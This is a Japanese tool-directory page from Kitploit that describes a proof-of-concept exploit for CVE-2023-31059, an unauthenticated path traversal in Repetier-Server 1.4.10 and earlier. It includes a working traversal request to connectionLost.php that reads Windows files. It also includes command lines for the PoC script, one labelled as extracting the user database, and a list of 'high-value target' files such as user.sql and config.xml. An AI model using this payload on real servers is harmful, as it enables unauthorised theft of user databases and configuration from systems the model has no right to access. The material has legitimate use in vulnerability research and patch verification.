Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-31059-Repetier-Server-1.4.10-Unauthenticated-Path-Traversal — CVE-2023-31059の概念実証エクスプロイト。Repetier-Server ≤1.4.10の認証なしパストラバーサルで、細工されたHTTPリクエストによる任意ファイル読み取りを可能にします。 | Kitploit
ツール/GitHubGitHub/mbanyamer/cve-2023-31059-repetier-server-1.4.10-unauthenticated-path-traversal
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト学習と教育
GitHubmbanyamer/cve-2023-31059-repetier-server-1.4.10-unauthenticated-path-traversal

CVE-2023-31059-Repetier-Server-1.4.10-Unauthenticated-Path-Traversal

CVE-2023-31059の概念実証エクスプロイト。Repetier-Server ≤1.4.10の認証なしパストラバーサルで、細工されたHTTPリクエストによる任意ファイル読み取りを可能にします。

リポジトリを見る
16ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Repetier-Server <= 1.4.10

著作者: Mohammed Idrees Banyamer
役割: セキュリティ研究者
国: ヨルダン 🇯🇴


概要

Repetier‑Server ≤ 1.4.10 における 認証不要のリモートパストラバーサル / LFI 脆弱性 に対する概念実証(PoC)エクスプロイトです。

この脆弱性により、connectionLost.php エンドポイントの巧妙に細工された ..%5c シーケンスを介して、任意のファイルを読み取ることが可能になります。


脆弱性の詳細

フィールド値
製品Repetier‑Server
影響を受けるバージョン≤ 1.4.10
CVECVE‑2023‑31059
タイプパストラバーサル / LFI
認証不要
攻撃ベクトルネットワーク
影響任意ファイル読み取り
CVSS9.8 Critical

PoC 攻撃フロー

root@kitploit:~
flowchart LR
    A[Attacker] -->|HTTP request with ..%5c traversal| B[Repetier Server]
    B --> C[base/connectionLost.php]
    C -->|Unsanitized file parameter| D[Windows Filesystem]
    D --> E[Sensitive File]
    E --> B
    B -->|File contents in HTTP response| A

攻撃例

root@kitploit:~
GET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344

使用方法

root@kitploit:~
# Test vulnerability
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test

# Extract user database
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
  --file "ProgramData\\Repetier-Server\\database\\user.sql" \
  --depth 20

要件

root@kitploit:~
pip install requests

高価値ターゲット

root@kitploit:~
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts

免責事項

この PoC は、教育および許可されたセキュリティテストの目的のみで提供されます。 テストは、自身が所有するシステム、または明示的なテスト許可を得たシステムに対してのみ実施してください。


連絡先

GitHub: https://github.com/mbanyamer

ツールをダウンロード